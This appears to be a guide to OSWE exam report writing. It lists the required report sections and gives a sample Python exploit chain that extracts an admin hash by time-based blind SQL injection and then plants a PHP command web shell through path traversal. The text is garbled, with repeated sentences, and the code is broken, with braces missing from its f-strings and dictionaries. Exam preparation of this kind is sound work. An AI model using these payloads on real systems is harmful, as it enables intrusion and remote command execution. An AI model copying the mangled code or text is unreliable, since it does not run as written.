Unlike OSCP’s “proof of exploit” focus, OSWE requires:
A passing OSWE report must contain the following (based on OffSec’s official template): oswe exam report
| Section | Required Content |
|--------|------------------|
| Objective | Brief summary of the test, targets, and overall outcome (e.g., “Achieved root/administrative access on both machines”) |
| Methodology | High-level approach – source code review, attack surface mapping, vulnerability discovery, exploit development |
| Vulnerabilities & Exploits | One detailed section per unique vulnerability chain. Include:
- Vulnerability type (e.g., SSTI, SQLi, deserialization)
- Affected code snippet (with line numbers)
- Proof of concept (PoC) – working exploit script
- Step-by-step reproduction |
| Flags / Proofs | Screenshots of proof.txt (or equivalent) and sensitive data (e.g., /etc/shadow, database contents) |
| Remediation | Brief fix for each vulnerability (optional for passing, but good practice) |
| Appendix | Full exploit code, curl commands, logs, or additional notes | Unlike OSCP’s “proof of exploit” focus, OSWE requires:
Unlike the OSCP (where each flag is independent), the OSWE often requires a chain of exploits to achieve RCE. Unlike the OSCP (where each flag is independent),
You must document the attack chain step-by-step:
Format this as a numbered list with code blocks. If the reviewer cannot replicate your chain in 10 minutes, you fail.
The script utilizes the requests library to simulate browser behavior and BeautifulSoup for parsing HTML responses during the SQLi extraction phase.
import requests
import sys
import argparse
from bs4 import BeautifulSoup
class Exploit:
def __init__(self, target_url, luser, lpass):
self.target = target_url.rstrip('/')
self.session = requests.Session()
self.luser = luser
self.lpass = lpass
def authenticate(self):
"""Authenticates as a low-privileged user to establish a session."""
print(f"[*] Authenticating as self.luser...")
login_url = f"self.target/login.php"
data = 'username': self.luser, 'password': self.lpass
r = self.session.post(login_url, data=data)
if "Dashboard" in r.text:
print("[+] Authentication successful.")
return True
print("[-] Authentication failed.")
return False
def extract_admin_hash(self):
"""
Extracts admin hash via Blind SQLi.
Assumption: Vulnerable param is 'search_term' in search functionality.
"""
print("[*] Starting Blind SQL Injection extraction...")
url = f"self.target/search.php"
charset = "abcdef0123456789" # Assuming MD5
extracted_hash = ""
# POC for position 1 of the hash
# Query logic: IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0)
for i in range(1, 33):
for char in charset:
# Payload construction (Simplified for report context)
payload = f"test' AND (SELECT SLEEP(5) FROM users WHERE username='admin' AND SUBSTRING(password,i,1)='char')-- -"
data = 'search_term': payload
try:
r = self.session.post(url, data=data, timeout=10)
# If response takes > 5 seconds, we found the char
# (In real script, we would measure time.time())
except requests.exceptions.Timeout:
extracted_hash += char
print(f"[+] Found char i: char -> Current hash: extracted_hash")
break
return extracted_hash
def write_shell(self, admin_session):
"""Writes a PHP web shell to the server."""
print("[*] Attempting to write web shell...")
shell_url = f"self.target/admin/file_manager.php"
shell_path = "shell.php"
shell_content = "<?php system($_GET['cmd']); ?>"
data =
'path': f"../../shell_path", # Traversal to web root
'content': shell_content
# Note: In a real exam, we would need to handle CSRF tokens here
admin_session.post(shell_url, data=data)
# Verify
verify_url = f"self.target/shell_path?cmd=id"
r = admin_session.get(verify_url)
if "uid=" in r.text:
print("[+] Shell written successfully!")
print(f"[+] Output: r.text")
return True
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="OSWE Exam Exploit Chain")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-l', '--luser', required=True, help='Low Priv User')
parser.add_argument('-p', '--lpass', required=True, help='Low Priv Pass')
args = parser.parse_args()
exploit = Exploit(args.url, args.luser, args.lpass)
if exploit.authenticate():
# Step 1: Get Admin Hash
# admin_hash = exploit.extract_admin_hash()
# For the report, we assume we successfully cracked this offline
# or bypassed the login.
# Step 2: Login as Admin (omitted for brevity)
# ...
# Step 3: Write Shell
exploit.write_shell(exploit.session)
